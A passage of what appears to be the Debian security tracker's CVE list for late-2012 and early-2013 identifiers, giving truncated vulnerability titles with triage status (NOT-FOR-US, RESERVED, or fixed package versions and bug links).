	NOT-FOR-US: Schneider Electric Accutech Manager
CVE-2013-0657 (Stack-based buffer overflow in Schneider Electric Interactive ...)
	NOT-FOR-US: Schneider Electric IGSS
CVE-2013-0656 (Buffer overflow in a third-party ActiveX component in Siemens SIMATIC ...)
	NOT-FOR-US: Siemens SIMATIC
CVE-2013-0655 (The client in Schneider Electric Software Update (SESU) Utility 1.0.x ...)
	NOT-FOR-US: Schneider Electric SESU
CVE-2013-0654 (CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2013-0653 (Directory traversal vulnerability in substitute.bcl in the WebView ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2013-0652 (GE Intelligent Platforms Proficy Real-Time Information Portal does not ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2013-0651 (The Portal installation process in GE Intelligent Platforms Proficy ...)
	NOT-FOR-US: GE Intelligent Platforms Proficy
CVE-2012-6432 (Symfony 2.0.x before 2.0.20, 2.1.x before 2.1.5, and 2.2-dev, when the ...)
	NOT-FOR-US: Symfony
CVE-2012-6431 (Symfony 2.0.x before 2.0.20 does not process URL encoded data ...)
	NOT-FOR-US: Symfony
CVE-2012-6430
	RESERVED
CVE-2012-6429
	RESERVED
CVE-2013-0650 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0649 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0648 (Unspecified vulnerability in the ExternalInterface ActionScript ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0647 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0646 (Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0645 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0644 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0643 (The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0642 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0641 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.4, 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-0640 (Adobe Reader and Acrobat 9.x before 9.5.4, 10.x before 10.1.6, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-0639 (Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0638 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0637 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0636 (Stack-based buffer overflow in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-0635 (Adobe Shockwave Player before 12.0.0.112 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-0634 (Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0633 (Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0632 (Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0631 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2 allows attackers to obtain ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0630 (Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-0629 (Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10, when a password is not ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0628
	RESERVED
CVE-2013-0627 (Unspecified vulnerability in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0626 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0625 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2, when a password is not ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-0624 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0623 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0622 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0621 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0620 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0619 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0618 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0617 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0616 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0615 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0614 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0613 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0612 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0611 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0610 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0609 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0608 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0607 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0606 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0605 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0604 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0603 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0602 (Use-after-free vulnerability in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2013-0601 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...)
	NOT-FOR-US: Adobe Reader and Acrobat
CVE-2012-6428 (Carlo Gavazzi EOS-Box with firmware before 1.0.0.1080_2.1.10 ...)
	NOT-FOR-US: Carlo Gavazzi EOS-Box
CVE-2012-6427 (Multiple SQL injection vulnerabilities in Carlo Gavazzi EOS-Box with ...)
	NOT-FOR-US: Carlo Gavazzi EOS-Box
CVE-2012-6426 (LemonLDAP::NG before 1.2.3 does not use the signature-verification ...)
	- lemonldap-ng 1.2.2-3 (bug #696329)
	[wheezy] - lemonldap-ng 1.1.2-5+deb7u1
	[squeeze] - lemonldap-ng (SAML code not present)
CVE-2013-0600 (Unspecified vulnerability on IBM WebSphere DataPower XC10 Appliance ...)
	NOT-FOR-US: IBM WebSphere DataPower XC10 Appliance devices
CVE-2013-0599
	RESERVED
CVE-2013-0598
	RESERVED
CVE-2013-0597
	RESERVED
CVE-2013-0596
	RESERVED
CVE-2013-0595
	RESERVED
CVE-2013-0594
	RESERVED
CVE-2013-0593 (Unspecified vulnerability in the olch2x32 ActiveX control in IBM SPSS ...)
	NOT-FOR-US: IBM SPSS SamplePower
CVE-2013-0592
	RESERVED
CVE-2013-0591
	RESERVED
CVE-2013-0590
	RESERVED
CVE-2013-0589
	RESERVED
CVE-2013-0588
	RESERVED
CVE-2013-0587
	RESERVED
CVE-2013-0586
	RESERVED
CVE-2013-0585
	RESERVED
CVE-2013-0584 (The Data Replication Dashboard component in IBM InfoSphere Replication ...)
	NOT-FOR-US: IBM InfoSphere Replication Server
CVE-2013-0583
	RESERVED
CVE-2013-0582 (Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated ...)
	NOT-FOR-US: IBM Tivoli Federated Identity Manager
CVE-2013-0581
	RESERVED
CVE-2013-0580
	RESERVED
CVE-2013-0579
	RESERVED
CVE-2013-0578 (The Sterling Order Management APIs in IBM Sterling Multi-Channel ...)
	NOT-FOR-US: IBM
CVE-2013-0577
	RESERVED
CVE-2013-0576
	RESERVED
CVE-2013-0575
	RESERVED
CVE-2013-0574
	RESERVED
CVE-2013-0573
	RESERVED
CVE-2013-0572 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for ...)
	NOT-FOR-US: IBM Document Connect for Application Support Facility
CVE-2013-0571 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for ...)
	NOT-FOR-US: IBM Document Connect for Application Support Facility
CVE-2013-0570
	RESERVED
CVE-2013-0569 (Cross-site scripting (XSS) vulnerability in the Communities component ...)
	NOT-FOR-US: IBM Connections
CVE-2013-0568
	RESERVED
CVE-2013-0567
	RESERVED
CVE-2013-0566
	RESERVED
CVE-2013-0565 (Cross-site scripting (XSS) vulnerability in the RPC adapter for the ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0564
	RESERVED
CVE-2013-0563
	RESERVED
CVE-2013-0562
	RESERVED
CVE-2013-0561
	RESERVED
CVE-2013-0560
	RESERVED
CVE-2013-0559
	RESERVED
CVE-2013-0558
	RESERVED
CVE-2013-0557
	RESERVED
CVE-2013-0556
	RESERVED
CVE-2013-0555
	RESERVED
CVE-2013-0554
	RESERVED
CVE-2013-0553 (The client implementation in IBM Sametime 8.5.1 through 8.5.2.1, as ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-0552
	RESERVED
CVE-2013-0551
	RESERVED
CVE-2013-0550
	RESERVED
CVE-2013-0549
	RESERVED
CVE-2013-0548
	RESERVED
CVE-2013-0547
	RESERVED
CVE-2013-0546
	RESERVED
CVE-2013-0545
	RESERVED
CVE-2013-0544 (Directory traversal vulnerability in the Administrative Console in IBM ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0543 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0542 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0541 (Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0540 (IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0539
	RESERVED
CVE-2013-0538 (Cross-site scripting (XSS) vulnerability in IBM Lotus Notes 8.x before ...)
	NOT-FOR-US: IBM Lotus Notes
CVE-2013-0537
	RESERVED
CVE-2013-0536
	RESERVED
CVE-2013-0535 (Multiple cross-site scripting (XSS) vulnerabilities in the Classic ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-0534
	RESERVED
CVE-2013-0533 (Cross-site scripting (XSS) vulnerability in the Sametime Links server ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-0532 (Cross-site request forgery (CSRF) vulnerability in IBM Security ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0531
	RESERVED
CVE-2013-0530
	RESERVED
CVE-2013-0529
	RESERVED
CVE-2013-0528
	RESERVED
CVE-2013-0527
	RESERVED
CVE-2013-0526
	RESERVED
CVE-2013-0525 (Multiple cross-site scripting (XSS) vulnerabilities in IBM iNotes ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0524
	RESERVED
CVE-2013-0523
	RESERVED
CVE-2013-0522
	RESERVED
CVE-2013-0521
	RESERVED
CVE-2013-0520 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim ...)
	NOT-FOR-US: IBM
CVE-2013-0519 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim ...)
	NOT-FOR-US: IBM
CVE-2013-0518 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim ...)
	NOT-FOR-US: IBM
CVE-2013-0517
	RESERVED
CVE-2013-0516
	RESERVED
CVE-2013-0515
	RESERVED
CVE-2013-0514
	RESERVED
CVE-2013-0513 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM ...)
	NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester
CVE-2013-0512 (Stack-based buffer overflow in the Manual Explore browser plug-in for ...)
	NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester
CVE-2013-0511 (Multiple SQL injection vulnerabilities in IBM Security AppScan ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0510 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 includes a ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0509
	RESERVED
CVE-2013-0508
	RESERVED
CVE-2013-0507
	RESERVED
CVE-2013-0506 (Cross-site scripting (XSS) vulnerability in IBM Sterling Order ...)
	NOT-FOR-US: IBM Sterling Order Management
CVE-2013-0505 (IBM Sterling Order Management 8.0 before HF127, 8.5 before HF89, 9.0 ...)
	NOT-FOR-US: IBM Sterling Order Management
CVE-2013-0504 (Buffer overflow in the broker service in Adobe Flash Player before ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0503 (Cross-site scripting (XSS) vulnerability in the Bookmarks component in ...)
	NOT-FOR-US: IBM Lotus Connections
CVE-2013-0502 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2013-0501 (The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in ...)
	NOT-FOR-US: IBM Cognos Disclosure Management
CVE-2013-0500
	RESERVED
CVE-2013-0499
	RESERVED
CVE-2013-0498
	RESERVED
CVE-2013-0497
	RESERVED
CVE-2013-0496
	RESERVED
CVE-2013-0495
	RESERVED
CVE-2013-0494
	RESERVED
CVE-2013-0493
	RESERVED
CVE-2013-0492
	RESERVED
CVE-2013-0491
	RESERVED
CVE-2013-0490 (Unspecified vulnerability in IBM InfoSphere Guardium S-TAP 8.1 for DB2 ...)
	NOT-FOR-US: IBM InfoSphere Guardium
CVE-2013-0489 (Cross-site request forgery (CSRF) vulnerability in webadmin.nsf (aka ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0488 (Cross-site scripting (XSS) vulnerability in webadmin.nsf (aka the Web ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0487 (The Java Console in IBM Domino 8.5.x allows remote authenticated users ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0486 (Memory leak in the HTTP server in IBM Domino 8.5.x allows remote ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0485
	RESERVED
CVE-2013-0484
	RESERVED
CVE-2013-0483 (The login component in SOAP Gateway in IBM IMS Enterprise Suite 1.1, ...)
	NOT-FOR-US: IBM IMS Enterprise Suite
CVE-2013-0482
	RESERVED
CVE-2013-0481
	RESERVED
CVE-2013-0480
	RESERVED
CVE-2013-0479
	RESERVED
CVE-2013-0478 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data ...)
	NOT-FOR-US: IBM
CVE-2013-0477 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...)
	NOT-FOR-US: IBM
CVE-2013-0476
	RESERVED
CVE-2013-0475
	RESERVED
CVE-2013-0474 (The Manual Explore browser plug-in in IBM Security AppScan Enterprise ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0473 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Security ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0472 (The Web GUI in the client in IBM Tivoli Storage Manager (TSM) 6.3 ...)
	NOT-FOR-US: IBM
CVE-2013-0471 (The traditional scheduler in the client in IBM Tivoli Storage Manager ...)
	NOT-FOR-US: IBM
CVE-2013-0470 (HTTPD in IBM Netezza Performance Portal 1.0.2 allows remote ...)
	NOT-FOR-US: IBM
CVE-2013-0469
	RESERVED
CVE-2013-0468
	RESERVED
CVE-2013-0467 (IBM Eclipse Help System (IEHS), as used in IBM Data Studio 3.1 and ...)
	NOT-FOR-US: IBM
CVE-2013-0466 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Message ...)
	NOT-FOR-US: IBM
CVE-2013-0465 (Unspecified vulnerability in the IBM WebSphere Cast Iron physical and ...)
	NOT-FOR-US: IBM
CVE-2013-0464
	RESERVED
CVE-2013-0463
	RESERVED
CVE-2013-0462 (Unspecified vulnerability in IBM WebSphere Application Server (WAS) ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0461 (Cross-site scripting (XSS) vulnerability in the virtual member manager ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0460 (Cross-site request forgery (CSRF) vulnerability in the portlet ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0459 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0458 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0457 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM
CVE-2013-0456
	RESERVED
CVE-2013-0455
	RESERVED
CVE-2013-0454 (The SMB2 implementation in Samba 3.6.x before 3.6.6, as used on the ...)
	- samba 2:3.6.6-1
	[squeeze] - samba (only Samba 3.6.0 - 3.6.5 (inclusive) affected)
	NOTE: https://www.samba.org/samba/security/CVE-2013-0454
CVE-2013-0453 (Cross-site scripting (XSS) vulnerability in Web Reports in IBM Tivoli ...)
	NOT-FOR-US: IBM Tivoli Endpoint Manager
CVE-2013-0452 (Cross-site request forgery (CSRF) vulnerability in the Software Use ...)
	NOT-FOR-US: IBM Tivoli Endpoint Manager
CVE-2013-0451
	RESERVED
CVE-2012-6425
	RESERVED
CVE-2012-6424
	RESERVED
CVE-2012-6423
	RESERVED
CVE-2012-6422 (The kernel in Samsung Galaxy S2, Galaxy Note 2, MEIZU MX, and possibly ...)
	NOT-FOR-US: Android kernel
CVE-2012-6421
	RESERVED
CVE-2012-6420
	RESERVED
CVE-2012-6419
	RESERVED
CVE-2012-6418
	RESERVED
CVE-2012-6417
	RESERVED
CVE-2012-6416
	RESERVED
CVE-2012-6415
	RESERVED
CVE-2012-6414
	RESERVED
CVE-2012-6413
	RESERVED
CVE-2012-6412
	RESERVED
CVE-2012-6411
	RESERVED
CVE-2012-6410
	RESERVED
CVE-2012-6409
	RESERVED
CVE-2012-6408
	RESERVED
CVE-2012-6407
	RESERVED
CVE-2012-6406
	RESERVED
CVE-2012-6405
	RESERVED
CVE-2012-6404
	RESERVED
CVE-2012-6403
	RESERVED
CVE-2012-6402
	RESERVED
CVE-2012-6401
	RESERVED
CVE-2012-6400
	RESERVED
CVE-2012-6399
	RESERVED
CVE-2012-6398
	RESERVED
CVE-2012-6397 (Cross-site scripting (XSS) vulnerability in Cisco WebEx Social ...)
	NOT-FOR-US: Cisco WebEx Social
CVE-2012-6396 (Cisco NX-OS on Nexus 7000 series switches does not properly handle ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2012-6395 (Cisco Adaptive Security Appliances (ASA) devices with firmware 8.4 do ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2012-6394
	RESERVED
CVE-2012-6393
	RESERVED
CVE-2012-6392 (Cisco Prime LAN Management Solution (LMS) 4.1 through 4.2.2 on Linux ...)
	NOT-FOR-US: Cisco Prime LMS
CVE-2012-6391
	RESERVED
CVE-2012-6390
	RESERVED
CVE-2012-6389
	RESERVED
CVE-2012-6388
	RESERVED
CVE-2012-6387
	RESERVED
CVE-2012-6386
	RESERVED
CVE-2012-6385
	RESERVED
CVE-2012-6384
	RESERVED
CVE-2012-6383
	RESERVED
CVE-2012-6382
	RESERVED
CVE-2012-6381
	RESERVED
CVE-2012-6380
	RESERVED
CVE-2012-6379
	RESERVED
CVE-2012-6378
	RESERVED
CVE-2012-6377
	RESERVED
CVE-2012-6376
	RESERVED
CVE-2012-6375
	RESERVED
CVE-2012-6374
	RESERVED
CVE-2012-6373
	RESERVED
CVE-2012-6372
	RESERVED
CVE-2012-6371 (The WPA2 implementation on the Belkin N900 F9K1104v1 router ...)
	NOT-FOR-US: Belkin router
CVE-2012-6370
	RESERVED
CVE-2012-6369 (Cross-site scripting (XSS) vulnerability in the Troubleshooting ...)
	NOT-FOR-US: AgileBits 1Password
CVE-2012-6368
	RESERVED
CVE-2012-6367
	RESERVED
CVE-2012-6366
	RESERVED
CVE-2012-6365
	RESERVED
CVE-2012-6364
	RESERVED
CVE-2012-6363
	RESERVED
CVE-2012-6362
	RESERVED
CVE-2012-6361
	RESERVED
CVE-2012-6360 (Cross-site scripting (XSS) vulnerability in IBM Intelligent Operations ...)
	NOT-FOR-US: IBM Intelligent Operations Center
CVE-2012-6359 (IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.11, ...)
	NOT-FOR-US: IBM Tivoli
CVE-2012-6358
	RESERVED
CVE-2012-6357 (IBM Maximo Asset Management 7.5, Maximo Asset Management Essentials ...)
	NOT-FOR-US: IBM
CVE-2012-6356 (IBM Maximo Asset Management 7.5, Maximo Asset Management Essentials ...)
	NOT-FOR-US: IBM
CVE-2012-6355 (IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management ...)
	NOT-FOR-US: IBM
CVE-2012-6354 (The management GUI on the IBM SAN Volume Controller and Storwize V7000 ...)
	NOT-FOR-US: IBM
CVE-2012-6353
	RESERVED
CVE-2012-6352 (The Session Manager in IBM Sterling Connect:Direct through 4.1.0.3 on ...)
	NOT-FOR-US: IBM Sterling Connect:Direct
CVE-2012-6351
	RESERVED
CVE-2012-6350 (Cross-site scripting (XSS) vulnerability in the Web component in IBM ...)
	NOT-FOR-US: IBM Cognos TM1
CVE-2012-6349
	RESERVED
CVE-2012-6348 (Centrify Deployment Manager 2.1.0.283, as distributed in Centrify ...)
	NOT-FOR-US: Centrify
CVE-2012-6347
	RESERVED
CVE-2012-6346
	RESERVED
CVE-2012-6345
	RESERVED
CVE-2012-6344
	RESERVED
CVE-2012-6343
	RESERVED
CVE-2012-6342
	RESERVED
	NOT-FOR-US: Atlassian Confluence
CVE-2012-6341
	RESERVED
CVE-2012-6340
	RESERVED
CVE-2012-6339 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	NOT-FOR-US: Cerberus FTP Server
CVE-2012-6338
	RESERVED
CVE-2012-6337 (The Track My Mobile feature in the SamsungDive subsystem for Android ...)
	NOT-FOR-US: SamsungDive on Samsung Galaxy
CVE-2012-6336 (The Missing Device feature in Lookout allows physically proximate ...)
	NOT-FOR-US: Lookout
CVE-2012-6335 (The Anti-theft service in AVG AntiVirus for Android allows physically ...)
	NOT-FOR-US: AVG AntiVirus for Android
CVE-2012-6334 (The Track My Mobile feature in the SamsungDive subsystem for Android ...)
	NOT-FOR-US: SamsungDive subsystem for Android
CVE-2011-5251 (Open redirect vulnerability in forum/login.php in vBulletin 4.1.3 and ...)
	NOT-FOR-US: vBulletin
CVE-2012-6333 (Multiple HVM control operations in Xen 3.4 through 4.2 allow local HVM ...)
	{DSA-2636-1}
	- xen 4.1.3-8
CVE-2012-6332
	RESERVED
CVE-2012-6331
	RESERVED
CVE-2012-6330 (The localization functionality in TWiki before 5.1.3, and Foswiki ...)
	- foswiki (bug #509864)
CVE-2012-6329 (The _compile function in Maketext.pm in the Locale::Maketext ...)
	- perl 5.14.2-16 (bug #695224)
	[squeeze] - perl 5.10.1-17squeeze5
	- foswiki (bug #509864)
CVE-2012-6328
	RESERVED
CVE-2012-6327
	RESERVED
CVE-2012-6326 (VMware vCenter Server 4.1 before Update 3 and 5.0 before Update 2, and ...)
	NOT-FOR-US: vCenter
CVE-2012-6325 (VMware vCenter Server Appliance (vCSA) 5.0 before Update 2 does not ...)
	NOT-FOR-US: VMware vCenter Server Appliance
CVE-2012-6324 (Directory traversal vulnerability in VMware vCenter Server Appliance ...)
	NOT-FOR-US: VMware vCenter Server Appliance
CVE-2013-0450 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0449 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0448 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7
	NOTE: Affects the Libraries component, likely part of IcedTea/OpenJDK
CVE-2013-0447 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0446 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0445 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12.1-1
	- openjdk-7
	NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69
	NOTE: openjdk-7 fixed in experimental: 7u13-2.3.6-1
CVE-2013-0444 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 7u3-2.1.6-1
	NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/ce04db4aba39
CVE-2013-0443 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0442 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
	NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69
CVE-2013-0441 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0440 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0439 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0438 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0437 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0436 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0435 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0434 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0433 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
